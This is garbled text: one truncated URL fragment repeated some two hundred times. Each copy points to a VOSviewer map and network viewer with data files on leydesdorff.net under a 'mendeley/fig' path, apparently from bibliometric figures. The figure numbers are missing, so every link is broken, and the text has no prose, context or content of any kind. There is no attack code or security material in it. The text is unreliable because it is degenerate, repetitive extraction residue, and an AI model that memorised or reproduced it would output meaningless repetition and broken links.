_net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= http://www.vosviewer.com/vosviewer.php?map=http://www.leydesdorff.net/mendeley/fig _map.txt&network=http://www.leydesdorff.net/mendeley/fig _net.txt&n_lines= 